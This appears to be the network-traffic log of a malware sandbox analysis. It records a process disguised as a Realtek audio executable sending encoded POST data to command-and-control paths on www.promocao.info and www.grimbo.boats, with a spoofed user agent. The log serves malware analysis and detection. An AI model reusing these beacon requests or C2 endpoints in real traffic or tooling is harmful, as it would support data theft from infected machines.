Jan 7, 2025 10:09:04.463020086 CET	739	OUT	POST /zaz4/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.promocao.info Origin: http://www.promocao.info Cache-Control: max-age=0 Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.promocao.info/zaz4/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 75 66 69 39 31 6a 47 74 53 74 43 6d 58 36 6c 39 72 52 70 51 69 52 31 4b 4a 39 6c 42 51 48 56 63 7a 67 3d 3d Data Ascii: KI7UaA4=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczufi91jGtStCmX6l9rRpQiR1KJ9lBQHVczg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49749	84.32.84.32	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:07.203402042 CET	759	OUT	POST /zaz4/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.promocao.info Origin: http://www.promocao.info Cache-Control: max-age=0 Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.promocao.info/zaz4/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 70 34 4e 4e 63 70 53 46 55 48 75 69 34 36 63 47 62 53 79 74 55 58 44 6c 4b 6a 70 35 31 44 5a 49 55 3d Data Ascii: KI7UaA4=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hCp4NNcpSFUHui46cGbSytUXDlKjp51DZIU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49750	84.32.84.32	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:09.938079119 CET	1289	OUT	POST /zaz4/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.promocao.info Origin: http://www.promocao.info Cache-Control: max-age=0 Content-Length: 7372 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.promocao.info/zaz4/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 4f 42 55 5a 5a 59 74 79 46 44 79 54 70 59 42 50 4d 51 64 32 41 34 77 68 78 4f 62 58 2f 63 36 35 51 69 46 6d 79 52 7a 72 31 36 48 4e 69 4d 55 6b 36 5a 39 71 39 36 59 54 32 5a 49 6d 55 68 51 61 47 4f 33 6e 69 55 6b 30 6b 76 51 48 6a 51 5a 76 70 36 2b 63 69 50 7a 4c 54 73 7a 48 32 4c 6d 6c 72 70 49 4b 39 77 34 32 45 53 6b 6d 36 64 54 37 2f 54 39 6b 38 2b 52 70 45 4f 32 50 55 6e 37 39 30 4d 79 6a 64 7a 71 6c 65 37 55 32 46 52 62 35 70 59 65 31 56 65 2f 43 32 56 71 59 39 50 51 41 [TRUNCATED] Data Ascii: KI7UaA4=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd+OBUZZYtyFDyTpYBPMQd2A4whxObX/c65QiFmyRzr16HNiMUk6Z9q96YT2ZImUhQaGO3niUk0kvQHjQZvp6+ciPzLTszH2LmlrpIK9w42ESkm6dT7/T9k8+RpEO2PUn790Myjdzqle7U2FRb5pYe1Ve/C2VqY9PQArNtMlSN/lf6l6sVh3Qe7G40d+pWelc6tLl+6UAheu1BTh4eKU6yHLdsXdKxoB7cZ/B6NJ6gcXFVr3CpQtSKocPb7vRw2yjcbwHToVJjKh7LUdzAfzyaH1IFvvYv4e8RZb5dT5MlXYERTYzfDayaaE/PRXIMPii5hrMhuq1GubSBViFbR/OWt9JWT/xx2d8fpwaUfw766x+R0uCq/Ag0nuDuerBPx3tIzDEP53ndFAZUZqk7QIHq4e+pt+NRhxHIYA+8zPbDpmjT9FjsN4R/NWor1UtD3h3qCSx/ej6ApkvJ+OeUNGH6PXY51/yWgmOJYPwJERFDW1AUc6aEIfpDRq4jzaM8vnBuafFQQWuL8IGSd5FXgJLaEkgY0z+ANZrVTSa+T/3LKDV8RiXtyyPw2c7q+8Lv5oIl
Jan 7, 2025 10:09:09.938138008 CET	6619	OUT	Data Raw: 37 71 50 62 43 63 47 58 54 45 34 65 77 72 57 43 33 61 70 46 4d 50 30 73 58 6e 73 53 32 50 57 33 42 73 50 62 59 63 37 4d 30 4b 6a 4f 75 6e 57 51 67 32 59 41 56 48 51 58 79 6b 6d 34 7a 6f 47 65 6e 74 34 41 43 7a 4c 78 77 48 63 6b 52 38 48 4b 38 6a Data Ascii: 7qPbCcGXTE4ewrWC3apFMP0sXnsS2PW3BsPbYc7M0KjOunWQg2YAVHQXykm4zoGent4ACzLxwHckR8HK8j+sg2XVr7T7IoGXeBq9btte4EN4Bw9r/SiI90SL38Ge7asFjwt5/gZUhLJ4SFJAqOkodkhNREOibFPFznVDvHSghMR8VB+15mCiKS+AKN1xNcxPg4sk0oTN3q+ySVzP8r4PNSxKQZRVaCDaG9fM9JK0FqAfjXDbngv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49751	84.32.84.32	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:12.673835039 CET	471	OUT	GET /zaz4/?KI7UaA4=a/HH2smDyRg6YmpKuJ/CwFExB84HcD/ERV51bzugA0E0jiOKNXfjwDBbyDsX3ja9PlsooGpF4nQX9l9Mtzddkih80GA487ej2P9P6VRXNWvFWMG3SLWD8ho=&KHKq=K3iyk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.promocao.info Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 7, 2025 10:09:12.886480093 CET	1289	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 09:09:12 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding Server: hcdn alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 44ad812c1e74a4b35f5ec63a98bf2f33-int-edge3 Expires: Tue, 07 Jan 2025 09:09:11 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
Jan 7, 2025 10:09:12.886653900 CET	1289	IN	Data Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
Jan 7, 2025 10:09:12.886744976 CET	1289	IN	Data Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
Jan 7, 2025 10:09:12.886828899 CET	1289	IN	Data Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
Jan 7, 2025 10:09:12.886944056 CET	1289	IN	Data Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
Jan 7, 2025 10:09:12.887070894 CET	1289	IN	Data Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
Jan 7, 2025 10:09:12.887178898 CET	1289	IN	Data Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023\|55296)),r=56320\|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
Jan 7, 2025 10:09:12.887295008 CET	1289	IN	Data Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75 Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49752	104.21.18.171	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:18.186222076 CET	736	OUT	POST /kxtt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.grimbo.boats Origin: http://www.grimbo.boats Cache-Control: max-age=0 Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.grimbo.boats/kxtt/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 35 75 74 45 42 77 63 52 71 41 44 4e 72 64 58 45 6c 7a 4d 41 44 54 37 4f 2b 6b 47 4c 41 35 58 6c 6b 41 3d 3d Data Ascii: KI7UaA4=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr5utEBwcRqADNrdXElzMADT7O+kGLA5XlkA==
Jan 7, 2025 10:09:18.533927917 CET	1071	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:18 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gnNxFnVGoROaYqZtQjNrnydHV%2B0x7N6NrieUwSd0kfi7iZVK7qeABe4I1E0zml9K85ALboOASoXq4vDvRZgsnyXcXlwdX8AivOzcGlInRAfqkrYE7TRG%2BBhIdarQN0dZpMfR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe2cee50ae7f604-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=118786&min_rtt=118786&rtt_var=59393&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\
Jan 7, 2025 10:09:18.533973932 CET	16	IN	Data Raw: 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a Data Ascii: b^U
Jan 7, 2025 10:09:18.533999920 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49753	104.21.18.171	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:20.830059052 CET	756	OUT	POST /kxtt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.grimbo.boats Origin: http://www.grimbo.boats Cache-Control: max-age=0 Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.grimbo.boats/kxtt/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 6e 38 36 55 2f 6a 43 37 57 2b 35 4a 43 4f 35 72 44 56 76 4a 74 37 71 36 4f 7a 47 45 6e 59 61 74 30 3d Data Ascii: KI7UaA4=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAAn86U/jC7W+5JCO5rDVvJt7q6OzGEnYat0=
Jan 7, 2025 10:09:21.180531979 CET	1075	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:21 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpSZC4z9YkVfFFEJMSflwRhudl0cwa%2Fxzk7gFsYEjVYZWKFQ9SbF7UZUOhUXyQ9QbGDASQMCwcZCYkAaDXKPJ84iEXBo243m%2FaU%2BTKe9UUMBOopzXtbZdiF6i9XvZC%2F9etaM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe2cef59a44dad8-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119530&min_rtt=119530&rtt_var=59765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\
Jan 7, 2025 10:09:21.180577040 CET	16	IN	Data Raw: 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a Data Ascii: b^U
Jan 7, 2025 10:09:21.180604935 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49754	104.21.18.171	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:23.485846996 CET	1289	OUT	POST /kxtt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.grimbo.boats Origin: http://www.grimbo.boats Cache-Control: max-age=0 Content-Length: 7372 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.grimbo.boats/kxtt/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 44 37 74 69 4d 71 48 76 43 67 34 62 41 72 49 2f 41 7a 65 41 49 44 68 2b 4c 71 54 2b 39 66 4f 6e 38 4a 4a 6a 38 47 77 63 42 50 74 4a 4a 46 35 64 51 50 56 45 6c 4c 73 77 71 4e 48 33 42 7a 32 39 6a 53 73 54 39 64 4b 4b 50 74 59 55 37 35 2f 47 36 64 52 45 48 63 55 75 52 4f 4b 75 79 35 4e 38 4c 33 68 72 76 69 56 71 6b 6d 59 7a 4e 63 35 6e 49 6d 54 70 65 39 45 33 31 62 74 37 54 78 33 33 6a 78 48 34 4d 71 31 35 64 5a 5a 6e 68 31 73 44 4b 41 55 2f 71 78 74 61 